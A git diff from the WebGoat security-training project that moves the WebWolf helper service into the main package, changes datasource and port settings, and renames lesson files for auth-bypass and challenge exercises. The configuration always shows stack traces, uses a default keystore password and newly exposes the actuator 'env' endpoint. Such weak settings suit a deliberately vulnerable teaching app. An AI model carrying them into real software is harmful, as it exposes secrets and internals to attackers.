index fcbacbcae..6f1fbafdf 100644
--- a/webwolf/src/main/java/org/owasp/webwolf/mailbox/MailboxController.java
+++ b/src/main/java/org/owasp/webgoat/webwolf/mailbox/MailboxController.java
@@ -20,16 +20,13 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webwolf.mailbox;
+package org.owasp.webgoat.webwolf.mailbox;
 
 import lombok.AllArgsConstructor;
 import lombok.extern.slf4j.Slf4j;
-import org.owasp.webwolf.user.UserRepository;
-import org.owasp.webwolf.user.WebGoatUser;
 import org.springframework.http.HttpStatus;
 import org.springframework.http.ResponseEntity;
 import org.springframework.security.core.context.SecurityContextHolder;
-import org.springframework.security.core.userdetails.User;
 import org.springframework.security.core.userdetails.UserDetails;
 import org.springframework.web.bind.annotation.GetMapping;
 import org.springframework.web.bind.annotation.PostMapping;
@@ -38,7 +35,6 @@ import org.springframework.web.bind.annotation.RestController;
 import org.springframework.web.servlet.ModelAndView;
 
 import java.util.List;
-import java.util.concurrent.Callable;
 
 @RestController
 @AllArgsConstructor
@@ -47,7 +43,7 @@ public class MailboxController {
 
     private final MailboxRepository mailboxRepository;
 
-    @GetMapping(value = "/WebWolf/mail")
+    @GetMapping(value = "/mail")
     public ModelAndView mail() {
         UserDetails user = (UserDetails) SecurityContextHolder.getContext().getAuthentication().getPrincipal();
         ModelAndView modelAndView = new ModelAndView();
@@ -61,11 +57,9 @@ public class MailboxController {
     }
 
     @PostMapping(value = "/mail")
-    public Callable<ResponseEntity<?>> sendEmail(@RequestBody Email email) {
-        return () -> {
-            mailboxRepository.save(email);
-            return ResponseEntity.status(HttpStatus.CREATED).build();
-        };
+    public ResponseEntity<?> sendEmail(@RequestBody Email email) {
+        mailboxRepository.save(email);
+        return ResponseEntity.status(HttpStatus.CREATED).build();
     }
 
 }
diff --git a/webwolf/src/main/java/org/owasp/webwolf/mailbox/MailboxRepository.java b/src/main/java/org/owasp/webgoat/webwolf/mailbox/MailboxRepository.java
similarity index 96%
rename from webwolf/src/main/java/org/owasp/webwolf/mailbox/MailboxRepository.java
rename to src/main/java/org/owasp/webgoat/webwolf/mailbox/MailboxRepository.java
index c1cd6df40..436498dab 100644
--- a/webwolf/src/main/java/org/owasp/webwolf/mailbox/MailboxRepository.java
+++ b/src/main/java/org/owasp/webgoat/webwolf/mailbox/MailboxRepository.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webwolf.mailbox;
+package org.owasp.webgoat.webwolf.mailbox;
 
 import org.springframework.data.jpa.repository.JpaRepository;
 
diff --git a/webwolf/src/main/java/org/owasp/webwolf/requests/LandingPage.java b/src/main/java/org/owasp/webgoat/webwolf/requests/LandingPage.java
similarity index 97%
rename from webwolf/src/main/java/org/owasp/webwolf/requests/LandingPage.java
rename to src/main/java/org/owasp/webgoat/webwolf/requests/LandingPage.java
index 502835e90..763340376 100644
--- a/webwolf/src/main/java/org/owasp/webwolf/requests/LandingPage.java
+++ b/src/main/java/org/owasp/webgoat/webwolf/requests/LandingPage.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webwolf.requests;
+package org.owasp.webgoat.webwolf.requests;
 
 import lombok.extern.slf4j.Slf4j;
 import org.springframework.http.ResponseEntity;
diff --git a/webwolf/src/main/java/org/owasp/webwolf/requests/Requests.java b/src/main/java/org/owasp/webgoat/webwolf/requests/Requests.java
similarity index 89%
rename from webwolf/src/main/java/org/owasp/webwolf/requests/Requests.java
rename to src/main/java/org/owasp/webgoat/webwolf/requests/Requests.java
index 5cffdc9cc..54c623dd2 100644
--- a/webwolf/src/main/java/org/owasp/webwolf/requests/Requests.java
+++ b/src/main/java/org/owasp/webgoat/webwolf/requests/Requests.java
@@ -20,14 +20,14 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webwolf.requests;
+package org.owasp.webgoat.webwolf.requests;
 
 import com.fasterxml.jackson.core.JsonProcessingException;
 import com.fasterxml.jackson.databind.ObjectMapper;
 import lombok.AllArgsConstructor;
 import lombok.Getter;
+import lombok.RequiredArgsConstructor;
 import lombok.extern.slf4j.Slf4j;
-
 import org.apache.commons.lang3.StringUtils;
 import org.springframework.boot.actuate.trace.http.HttpTrace;
 import org.springframework.boot.actuate.trace.http.HttpTrace.Request;
@@ -39,7 +39,6 @@ import org.springframework.web.bind.annotation.RequestMapping;
 import org.springframework.web.servlet.ModelAndView;
 
 import java.time.Instant;
-import java.util.List;
 
 import static java.util.stream.Collectors.toList;
 
@@ -51,9 +50,9 @@ import static java.util.stream.Collectors.toList;
  * @since 8/13/17.
  */
 @Controller
-@AllArgsConstructor
+@RequiredArgsConstructor
 @Slf4j
-@RequestMapping(value = "/WebWolf/requests")
+@RequestMapping(value = "/requests")
 public class Requests {
 
     private final WebWolfTraceRepository traceRepository;
@@ -69,14 +68,14 @@ public class Requests {
 
     @GetMapping
     public ModelAndView get() {
-        ModelAndView m = new ModelAndView("requests");
-        UserDetails user = (UserDetails) SecurityContextHolder.getContext().getAuthentication().getPrincipal();
-        List<Tracert> traces = traceRepository.findAllTraces().stream()
+        var model = new ModelAndView("requests");
+        var user = (UserDetails) SecurityContextHolder.getContext().getAuthentication().getPrincipal();
+        var traces = traceRepository.findAllTraces().stream()
         		.filter(t -> allowedTrace(t, user))
                 .map(t -> new Tracert(t.getTimestamp(), path(t), toJsonString(t))).collect(toList());
-        m.addObject("traces", traces);
+        model.addObject("traces", traces);
 
-        return m;
+        return model;
     }
     
     private boolean allowedTrace(HttpTrace t, UserDetails user) {
diff --git a/webwolf/src/main/java/org/owasp/webwolf/requests/WebWolfTraceRepository.java b/src/main/java/org/owasp/webgoat/webwolf/requests/WebWolfTraceRepository.java
similarity index 87%
rename from webwolf/src/main/java/org/owasp/webwolf/requests/WebWolfTraceRepository.java
rename to src/main/java/org/owasp/webgoat/webwolf/requests/WebWolfTraceRepository.java
index 6a0054389..5c117b666 100644
--- a/webwolf/src/main/java/org/owasp/webwolf/requests/WebWolfTraceRepository.java
+++ b/src/main/java/org/owasp/webgoat/webwolf/requests/WebWolfTraceRepository.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webwolf.requests;
+package org.owasp.webgoat.webwolf.requests;
 
 import com.google.common.collect.EvictingQueue;
 import com.google.common.collect.Lists;
@@ -28,6 +28,7 @@ import lombok.extern.slf4j.Slf4j;
 import org.springframework.boot.actuate.trace.http.HttpTrace;
 import org.springframework.boot.actuate.trace.http.HttpTraceRepository;
 
+import java.util.ArrayList;
 import java.util.List;
 
 /**
@@ -41,7 +42,8 @@ import java.util.List;
 public class WebWolfTraceRepository implements HttpTraceRepository {
 
     private final EvictingQueue<HttpTrace> traces = EvictingQueue.create(10000);
-    private List<String> exclusionList = Lists.newArrayList("/tmpdir", "/WebWolf/home", "/WebWolf/mail", "/WebWolf/files", "/images/", "/login", "/favicon.ico", "/js/", "/webjars/", "/WebWolf/requests", "/css/", "/mail");
+    private final List<String> exclusionList = List.of("/tmpdir", "/home", "/files",
+            "/images/", "/favicon.ico", "/js/", "/webjars/", "/requests", "/css/", "/mail");
 
     @Override
     public List<HttpTrace> findAll() {
@@ -49,7 +51,7 @@ public class WebWolfTraceRepository implements HttpTraceRepository {
     }
 
     public List<HttpTrace> findAllTraces() {
-        return Lists.newArrayList(traces);
+        return new ArrayList<>(traces);
     }
 
     private boolean isInExclusionList(String path) {
diff --git a/webwolf/src/main/java/org/owasp/webwolf/user/UserRepository.java b/src/main/java/org/owasp/webgoat/webwolf/user/UserRepository.java
similarity index 97%
rename from webwolf/src/main/java/org/owasp/webwolf/user/UserRepository.java
rename to src/main/java/org/owasp/webgoat/webwolf/user/UserRepository.java
index cd4229908..33332a53e 100644
--- a/webwolf/src/main/java/org/owasp/webwolf/user/UserRepository.java
+++ b/src/main/java/org/owasp/webgoat/webwolf/user/UserRepository.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webwolf.user;
+package org.owasp.webgoat.webwolf.user;
 
 import org.springframework.data.jpa.repository.JpaRepository;
 
diff --git a/webwolf/src/main/java/org/owasp/webwolf/user/UserService.java b/src/main/java/org/owasp/webgoat/webwolf/user/UserService.java
similarity index 94%
rename from webwolf/src/main/java/org/owasp/webwolf/user/UserService.java
rename to src/main/java/org/owasp/webgoat/webwolf/user/UserService.java
index ea3dd190e..d0799c5b1 100644
--- a/webwolf/src/main/java/org/owasp/webwolf/user/UserService.java
+++ b/src/main/java/org/owasp/webgoat/webwolf/user/UserService.java
@@ -20,11 +20,8 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webwolf.user;
+package org.owasp.webgoat.webwolf.user;
 
-import lombok.AllArgsConstructor;
-
-import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.security.core.userdetails.UserDetailsService;
 import org.springframework.security.core.userdetails.UsernameNotFoundException;
 import org.springframework.stereotype.Service;
diff --git a/webwolf/src/main/java/org/owasp/webwolf/user/WebGoatUser.java b/src/main/java/org/owasp/webgoat/webwolf/user/WebGoatUser.java
similarity index 90%
rename from webwolf/src/main/java/org/owasp/webwolf/user/WebGoatUser.java
rename to src/main/java/org/owasp/webgoat/webwolf/user/WebGoatUser.java
index b3286a2fa..e9da6eaf4 100644
--- a/webwolf/src/main/java/org/owasp/webwolf/user/WebGoatUser.java
+++ b/src/main/java/org/owasp/webgoat/webwolf/user/WebGoatUser.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webwolf.user;
+package org.owasp.webgoat.webwolf.user;
 
 import lombok.Getter;
 import org.springframework.security.core.GrantedAuthority;
@@ -42,13 +42,9 @@ import java.util.Collections;
 @Entity
 public class WebGoatUser implements UserDetails {
 
-    public static final String ROLE_USER = "WEBGOAT_USER";
-    public static final String ROLE_ADMIN = "WEBGOAT_ADMIN";
-
     @Id
     private String username;
     private String password;
-    private String role = ROLE_USER;
     @Transient
     private User user;
 
@@ -66,7 +62,7 @@ public class WebGoatUser implements UserDetails {
     }
 
     public Collection<? extends GrantedAuthority> getAuthorities() {
-        return Collections.singleton(new SimpleGrantedAuthority(getRole()));
+        return Collections.emptyList();
     }
 
     @Override
diff --git a/webgoat-container/src/main/resources/application-webgoat.properties b/src/main/resources/application-webgoat.properties
similarity index 82%
rename from webgoat-container/src/main/resources/application-webgoat.properties
rename to src/main/resources/application-webgoat.properties
index d873b1567..cd217395c 100644
--- a/webgoat-container/src/main/resources/application-webgoat.properties
+++ b/src/main/resources/application-webgoat.properties
@@ -2,9 +2,10 @@ server.error.include-stacktrace=always
 server.error.path=/error.html
 server.servlet.context-path=/WebGoat
 server.servlet.session.persistent=false
-server.port=${WEBGOAT_PORT:8080}
-server.address=${WEBGOAT_HOST:127.0.0.1}
-
+server.port=${webgoat.port:8080}
+server.address=${webgoat.host}
+webgoat.host=${WEBGOAT_HOST:127.0.0.1}
+spring.application.name=WebGoat
 
 server.ssl.key-store-type=${WEBGOAT_KEYSTORE_TYPE:PKCS12}
 server.ssl.key-store=${WEBGOAT_KEYSTORE:classpath:goatkeystore.pkcs12}
@@ -12,11 +13,11 @@ server.ssl.key-store-password=${WEBGOAT_KEYSTORE_PASSWORD:password}
 server.ssl.key-alias=${WEBGOAT_KEY_ALIAS:goat}
 server.ssl.enabled=${WEBGOAT_SSLENABLED:false}
 
-hsqldb.port=${WEBGOAT_HSQLPORT:9001}
-spring.datasource.url=jdbc:hsqldb:hsql://${server.address}:${hsqldb.port}/webgoat
+spring.datasource.url=jdbc:hsqldb:file:${webgoat.server.directory}/webgoat
 spring.jpa.properties.hibernate.dialect=org.hibernate.dialect.HSQLDialect
 spring.datasource.driver-class-name=org.hsqldb.jdbc.JDBCDriver
 spring.jpa.properties.hibernate.default_schema=CONTAINER
+spring.banner.location=classpath:banner.txt
 
 logging.level.org.thymeleaf=INFO
 logging.level.org.thymeleaf.TemplateEngine.CONFIG=INFO
@@ -28,7 +29,6 @@ logging.level.org.springframework.boot.devtools=INFO
 logging.level.org.owasp=DEBUG
 logging.level.org.owasp.webgoat=DEBUG
 
-webgoat.start.hsqldb=true
 webgoat.server.directory=${user.home}/.webgoat-${webgoat.build.version}/
 webgoat.user.directory=${user.home}/.webgoat-${webgoat.build.version}/
 webgoat.build.version=@project.version@
@@ -41,9 +41,9 @@ webgoat.default.language=en
 
 webwolf.host=${WEBWOLF_HOST:127.0.0.1}
 webwolf.port=${WEBWOLF_PORT:9090}
-webwolf.url=http://${webwolf.host}:${webwolf.port}/WebWolf
-webwolf.landingpage.url=http://${webwolf.host}:${webwolf.port}/landing
-webwolf.mail.url=http://${webwolf.host}:${webwolf.port}/mail
+webwolf.url=http://${webwolf.host}:${webwolf.port}
+webwolf.landingpage.url=${webwolf.url}/landing
+webwolf.mail.url=${webwolf.url}/mail
 
 spring.jackson.serialization.indent_output=true
 spring.jackson.serialization.write-dates-as-timestamps=false
@@ -59,4 +59,4 @@ exclude.lessons=${EXCLUDE_LESSONS:none,none}
 
 management.health.db.enabled=true
 management.endpoint.health.show-details=always
-management.endpoints.web.exposure.include=health,configprops
+management.endpoints.web.exposure.include=env, health,configprops
diff --git a/webwolf/src/main/resources/application-webwolf.properties b/src/main/resources/application-webwolf.properties
similarity index 76%
rename from webwolf/src/main/resources/application-webwolf.properties
rename to src/main/resources/application-webwolf.properties
index 2c5c464a7..eedc0599b 100644
--- a/webwolf/src/main/resources/application-webwolf.properties
+++ b/src/main/resources/application-webwolf.properties
@@ -1,15 +1,23 @@
 server.error.include-stacktrace=always
 server.error.path=/error.html
+server.port=${webwolf.port:9090}
+server.address=${webwolf.host}
+spring.application.name=WebWolf
 
-#server.contextPath=/WebWolf
-server.port=${WEBWOLF_PORT:9090}
-server.address=${WEBWOLF_HOST:127.0.0.1}
+webwolf.host=${WEBWOLF_HOST:127.0.0.1}
+
+management.server.port=-1
 server.servlet.session.cookie.name=WEBWOLFSESSION
 server.servlet.session.timeout=6000
+spring.flyway.enabled=false
 
-spring.jpa.properties.hibernate.default_schema=CONTAINER
+spring.thymeleaf.prefix=classpath:/webwolf/templates/
+
+
+spring.datasource.url=jdbc:hsqldb:file:${webgoat.server.directory}/webgoat
 spring.jpa.properties.hibernate.dialect=org.hibernate.dialect.HSQLDialect
-spring.jpa.hibernate.ddl-auto=update
+spring.datasource.driver-class-name=org.hsqldb.jdbc.JDBCDriver
+spring.jpa.properties.hibernate.default_schema=CONTAINER
 spring.messages.basename=i18n/messages
 spring.jmx.enabled=false
 
@@ -30,11 +38,9 @@ multipart.max-file-size=1Mb
 multipart.max-request-size=1Mb
 
 webgoat.build.version=@project.version@
-webgoat.actuator.base.url=http://${WEBGOAT_HOST:127.0.0.1}:${WEBGOAT_PORT:8080}/WebGoat/actuator
 webgoat.server.directory=${user.home}/.webgoat-${webgoat.build.version}/
 webwolf.fileserver.location=${java.io.tmpdir}/webwolf-fileserver
 
-
 spring.jackson.serialization.indent_output=true
 spring.jackson.serialization.write-dates-as-timestamps=false
 
diff --git a/src/main/resources/banner.txt b/src/main/resources/banner.txt
new file mode 100644
index 000000000..4afc67dea
--- /dev/null
+++ b/src/main/resources/banner.txt
@@ -0,0 +1,6 @@
+    __          __       _        _____                   _
+    \ \        / /      | |      / ____|                 | |
+     \ \  /\  / /  ___  | |__   | |  __    ___     __ _  | |_
+      \ \/  \/ /  / _ \ | '_ \  | | |_ |  / _ \   / _' | | __|
+       \  /\  /  |  __/ | |_) | | |__| | | (_) | | (_| | | |_
+        \/  \/    \___| |_.__/   \_____|  \___/   \__,_|  \__|
diff --git a/webgoat-container/src/main/resources/db/container/V1__init.sql b/src/main/resources/db/container/V1__init.sql
similarity index 100%
rename from webgoat-container/src/main/resources/db/container/V1__init.sql
rename to src/main/resources/db/container/V1__init.sql
diff --git a/webgoat-container/src/main/resources/db/container/V2__version.sql b/src/main/resources/db/container/V2__version.sql
similarity index 100%
rename from webgoat-container/src/main/resources/db/container/V2__version.sql
rename to src/main/resources/db/container/V2__version.sql
diff --git a/webgoat-container/src/main/resources/goatkeystore.pkcs12 b/src/main/resources/goatkeystore.pkcs12
similarity index 100%
rename from webgoat-container/src/main/resources/goatkeystore.pkcs12
rename to src/main/resources/goatkeystore.pkcs12
diff --git a/webgoat-container/src/main/resources/i18n/messages.properties b/src/main/resources/i18n/messages.properties
similarity index 100%
rename from webgoat-container/src/main/resources/i18n/messages.properties
rename to src/main/resources/i18n/messages.properties
diff --git a/webgoat-container/src/main/resources/i18n/messages_de.properties b/src/main/resources/i18n/messages_de.properties
similarity index 100%
rename from webgoat-container/src/main/resources/i18n/messages_de.properties
rename to src/main/resources/i18n/messages_de.properties
diff --git a/webgoat-container/src/main/resources/i18n/messages_fr.properties b/src/main/resources/i18n/messages_fr.properties
similarity index 100%
rename from webgoat-container/src/main/resources/i18n/messages_fr.properties
rename to src/main/resources/i18n/messages_fr.properties
diff --git a/webgoat-container/src/main/resources/i18n/messages_nl.properties b/src/main/resources/i18n/messages_nl.properties
similarity index 100%
rename from webgoat-container/src/main/resources/i18n/messages_nl.properties
rename to src/main/resources/i18n/messages_nl.properties
diff --git a/webgoat-container/src/main/resources/i18n/messages_ru.properties b/src/main/resources/i18n/messages_ru.properties
similarity index 100%
rename from webgoat-container/src/main/resources/i18n/messages_ru.properties
rename to src/main/resources/i18n/messages_ru.properties
diff --git a/webgoat-lessons/auth-bypass/src/main/resources/lessonPlans/en/2fa-bypass.adoc b/src/main/resources/lessons/auth_bypass/documentation/2fa-bypass.adoc
similarity index 100%
rename from webgoat-lessons/auth-bypass/src/main/resources/lessonPlans/en/2fa-bypass.adoc
rename to src/main/resources/lessons/auth_bypass/documentation/2fa-bypass.adoc
diff --git a/webgoat-lessons/auth-bypass/src/main/resources/lessonPlans/en/bypass-intro.adoc b/src/main/resources/lessons/auth_bypass/documentation/bypass-intro.adoc
similarity index 100%
rename from webgoat-lessons/auth-bypass/src/main/resources/lessonPlans/en/bypass-intro.adoc
rename to src/main/resources/lessons/auth_bypass/documentation/bypass-intro.adoc
diff --git a/webgoat-lessons/auth-bypass/src/main/resources/lessonPlans/en/lesson-template-video.adoc b/src/main/resources/lessons/auth_bypass/documentation/lesson-template-video.adoc
similarity index 100%
rename from webgoat-lessons/auth-bypass/src/main/resources/lessonPlans/en/lesson-template-video.adoc
rename to src/main/resources/lessons/auth_bypass/documentation/lesson-template-video.adoc
diff --git a/webgoat-lessons/auth-bypass/src/main/resources/html/AuthBypass.html b/src/main/resources/lessons/auth_bypass/html/AuthBypass.html
similarity index 90%
rename from webgoat-lessons/auth-bypass/src/main/resources/html/AuthBypass.html
rename to src/main/resources/lessons/auth_bypass/html/AuthBypass.html
index dcea54734..0ddb748a1 100644
--- a/webgoat-lessons/auth-bypass/src/main/resources/html/AuthBypass.html
+++ b/src/main/resources/lessons/auth_bypass/html/AuthBypass.html
@@ -4,14 +4,14 @@
         <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
         <!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
         which go in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
-        <div class="adoc-content" th:replace="doc:bypass-intro.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/auth_bypass/documentation/bypass-intro.adoc"></div>
     </div>
 
     <div class="lesson-page-wrapper">
         <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
         <!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
         which go in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
-        <div class="adoc-content" th:replace="doc:2fa-bypass.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/auth_bypass/documentation/2fa-bypass.adoc"></div>
         <div class="attack-container">
             <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
             <!-- using attack-form class on your form, will allow your request to be ajaxified and stay within the display framework for webgoat -->
@@ -72,9 +72,9 @@
         <!-- reuse the above lesson-page-wrapper block for each 'page' of content in your lesson -->
         <!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
         which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
-        <!--<div class="adoc-content" th:replace="doc:lesson-template-video.adoc"></div>-->
+        <!--<div class="adoc-content" th:replace="doc:lessons/auth_bypass/documentation/lesson-template-video.adoc"></div>-->
         <!-- can use multiple adoc's in a page-wrapper if you want ... or not-->
-        <!--<div class="adoc-content" th:replace="doc:lesson-template-attack.adoc"></div>-->
+        <!--<div class="adoc-content" th:replace="doc:lessons/auth_bypass/documentation/lesson-template-attack.adoc"></div>-->
 
         <!-- WebGoat will automatically style and scaffold some functionality by using the div.attack-container as below -->
 
diff --git a/webgoat-lessons/auth-bypass/src/main/resources/i18n/WebGoatLabels.properties b/src/main/resources/lessons/auth_bypass/i18n/WebGoatLabels.properties
similarity index 100%
rename from webgoat-lessons/auth-bypass/src/main/resources/i18n/WebGoatLabels.properties
rename to src/main/resources/lessons/auth_bypass/i18n/WebGoatLabels.properties
diff --git a/webgoat-lessons/auth-bypass/src/main/resources/images/firefox-proxy-config.png b/src/main/resources/lessons/auth_bypass/images/firefox-proxy-config.png
similarity index 100%
rename from webgoat-lessons/auth-bypass/src/main/resources/images/firefox-proxy-config.png
rename to src/main/resources/lessons/auth_bypass/images/firefox-proxy-config.png
diff --git a/webgoat-lessons/auth-bypass/src/main/resources/images/paypal-2fa-bypass.png b/src/main/resources/lessons/auth_bypass/images/paypal-2fa-bypass.png
similarity index 100%
rename from webgoat-lessons/auth-bypass/src/main/resources/images/paypal-2fa-bypass.png
rename to src/main/resources/lessons/auth_bypass/images/paypal-2fa-bypass.png
diff --git a/webgoat-lessons/auth-bypass/src/main/resources/js/bypass.js b/src/main/resources/lessons/auth_bypass/js/bypass.js
similarity index 100%
rename from webgoat-lessons/auth-bypass/src/main/resources/js/bypass.js
rename to src/main/resources/lessons/auth_bypass/js/bypass.js
diff --git a/webgoat-lessons/bypass-restrictions/src/main/resources/css/bypass-restrictions.css b/src/main/resources/lessons/bypass_restrictions/css/bypass-restrictions.css
similarity index 100%
rename from webgoat-lessons/bypass-restrictions/src/main/resources/css/bypass-restrictions.css
rename to src/main/resources/lessons/bypass_restrictions/css/bypass-restrictions.css
diff --git a/webgoat-lessons/bypass-restrictions/src/main/resources/lessonPlans/en/BypassRestrictions_FieldRestrictions.adoc b/src/main/resources/lessons/bypass_restrictions/documentation/BypassRestrictions_FieldRestrictions.adoc
similarity index 100%
rename from webgoat-lessons/bypass-restrictions/src/main/resources/lessonPlans/en/BypassRestrictions_FieldRestrictions.adoc
rename to src/main/resources/lessons/bypass_restrictions/documentation/BypassRestrictions_FieldRestrictions.adoc
diff --git a/webgoat-lessons/bypass-restrictions/src/main/resources/lessonPlans/en/BypassRestrictions_FrontendValidation.adoc b/src/main/resources/lessons/bypass_restrictions/documentation/BypassRestrictions_FrontendValidation.adoc
similarity index 100%
rename from webgoat-lessons/bypass-restrictions/src/main/resources/lessonPlans/en/BypassRestrictions_FrontendValidation.adoc
rename to src/main/resources/lessons/bypass_restrictions/documentation/BypassRestrictions_FrontendValidation.adoc
diff --git a/webgoat-lessons/bypass-restrictions/src/main/resources/lessonPlans/en/BypassRestrictions_Intro.adoc b/src/main/resources/lessons/bypass_restrictions/documentation/BypassRestrictions_Intro.adoc
similarity index 100%
rename from webgoat-lessons/bypass-restrictions/src/main/resources/lessonPlans/en/BypassRestrictions_Intro.adoc
rename to src/main/resources/lessons/bypass_restrictions/documentation/BypassRestrictions_Intro.adoc
diff --git a/webgoat-lessons/bypass-restrictions/src/main/resources/html/BypassRestrictions.html b/src/main/resources/lessons/bypass_restrictions/html/BypassRestrictions.html
similarity index 94%
rename from webgoat-lessons/bypass-restrictions/src/main/resources/html/BypassRestrictions.html
rename to src/main/resources/lessons/bypass_restrictions/html/BypassRestrictions.html
index 38eadc4f3..d32267c75 100755
--- a/webgoat-lessons/bypass-restrictions/src/main/resources/html/BypassRestrictions.html
+++ b/src/main/resources/lessons/bypass_restrictions/html/BypassRestrictions.html
@@ -6,12 +6,12 @@
     <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
     <!-- include content here. Content will be presented via asciidocs files,
     which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
-    <div class="adoc-content" th:replace="doc:BypassRestrictions_Intro.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/bypass_restrictions/documentation/BypassRestrictions_Intro.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
     <!-- stripped down without extra comments -->
-    <div class="adoc-content" th:replace="doc:BypassRestrictions_FieldRestrictions.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/bypass_restrictions/documentation/BypassRestrictions_FieldRestrictions.adoc"></div>
     <link rel="stylesheet" type="text/css" th:href="@{/lesson_css/bypass-restrictions.css}"/>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
@@ -59,7 +59,7 @@
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:BypassRestrictions_FrontendValidation.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/bypass_restrictions/documentation/BypassRestrictions_FrontendValidation.adoc"></div>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
 
diff --git a/webgoat-lessons/bypass-restrictions/src/main/resources/i18n/WebGoatLabels.properties b/src/main/resources/lessons/bypass_restrictions/i18n/WebGoatLabels.properties
similarity index 100%
rename from webgoat-lessons/bypass-restrictions/src/main/resources/i18n/WebGoatLabels.properties
rename to src/main/resources/lessons/bypass_restrictions/i18n/WebGoatLabels.properties
diff --git a/webgoat-lessons/challenge/src/main/resources/challenge7/git.zip b/src/main/resources/lessons/challenges/challenge7/git.zip
similarity index 100%
rename from webgoat-lessons/challenge/src/main/resources/challenge7/git.zip
rename to src/main/resources/lessons/challenges/challenge7/git.zip
diff --git a/webgoat-lessons/challenge/src/main/resources/css/challenge6.css b/src/main/resources/lessons/challenges/css/challenge6.css
similarity index 100%
rename from webgoat-lessons/challenge/src/main/resources/css/challenge6.css
rename to src/main/resources/lessons/challenges/css/challenge6.css
diff --git a/webgoat-lessons/challenge/src/main/resources/css/challenge8.css b/src/main/resources/lessons/challenges/css/challenge8.css
similarity index 100%
rename from webgoat-lessons/challenge/src/main/resources/css/challenge8.css
rename to src/main/resources/lessons/challenges/css/challenge8.css
diff --git a/webgoat-lessons/challenge/src/main/resources/db/migration/V2018_09_26_1__users.sql b/src/main/resources/lessons/challenges/db/migration/V2018_09_26_1__users.sql
similarity index 100%
rename from webgoat-lessons/challenge/src/main/resources/db/migration/V2018_09_26_1__users.sql
rename to src/main/resources/lessons/challenges/db/migration/V2018_09_26_1__users.sql
diff --git a/webgoat-lessons/challenge/src/main/resources/lessonPlans/en/Challenge_1.adoc b/src/main/resources/lessons/challenges/documentation/Challenge_1.adoc
similarity index 100%
rename from webgoat-lessons/challenge/src/main/resources/lessonPlans/en/Challenge_1.adoc
rename to src/main/resources/lessons/challenges/documentation/Challenge_1.adoc
diff --git a/webgoat-lessons/challenge/src/main/resources/lessonPlans/en/Challenge_5.adoc b/src/main/resources/lessons/challenges/documentation/Challenge_5.adoc
similarity index 100%
rename from webgoat-lessons/challenge/src/main/resources/lessonPlans/en/Challenge_5.adoc
rename to src/main/resources/lessons/challenges/documentation/Challenge_5.adoc
diff --git a/webgoat-lessons/challenge/src/main/resources/lessonPlans/en/Challenge_6.adoc b/src/main/resources/lessons/challenges/documentation/Challenge_6.adoc
similarity index 100%
rename from webgoat-lessons/challenge/src/main/resources/lessonPlans/en/Challenge_6.adoc
rename to src/main/resources/lessons/challenges/documentation/Challenge_6.adoc
diff --git a/webgoat-lessons/challenge/src/main/resources/lessonPlans/en/Challenge_7.adoc b/src/main/resources/lessons/challenges/documentation/Challenge_7.adoc
similarity index 100%
rename from webgoat-lessons/challenge/src/main/resources/lessonPlans/en/Challenge_7.adoc
rename to src/main/resources/lessons/challenges/documentation/Challenge_7.adoc
diff --git a/webgoat-lessons/challenge/src/main/resources/lessonPlans/en/Challenge_8.adoc b/src/main/resources/lessons/challenges/documentation/Challenge_8.adoc
similarity index 100%
rename from webgoat-lessons/challenge/src/main/resources/lessonPlans/en/Challenge_8.adoc
rename to src/main/resources/lessons/challenges/documentation/Challenge_8.adoc
diff --git a/webgoat-lessons/challenge/src/main/resources/lessonPlans/en/Challenge_introduction.adoc b/src/main/resources/lessons/challenges/documentation/Challenge_introduction.adoc
similarity index 100%
rename from webgoat-lessons/challenge/src/main/resources/lessonPlans/en/Challenge_introduction.adoc
rename to src/main/resources/lessons/challenges/documentation/Challenge_introduction.adoc
diff --git a/src/main/resources/lessons/challenges/html/Challenge.html b/src/main/resources/lessons/challenges/html/Challenge.html
new file mode 100644
index 000000000..713d902f3
--- /dev/null
+++ b/src/main/resources/lessons/challenges/html/Challenge.html
@@ -0,0 +1,9 @@
+    <!DOCTYPE html>
+
+<html xmlns:th="http://www.thymeleaf.org">
+
+<div class="lesson-page-wrapper">
+    <div class="adoc-content" th:replace="doc:lessons/challenges/documentation/Challenge_introduction.adoc"></div>
+</div>
+
+</html>
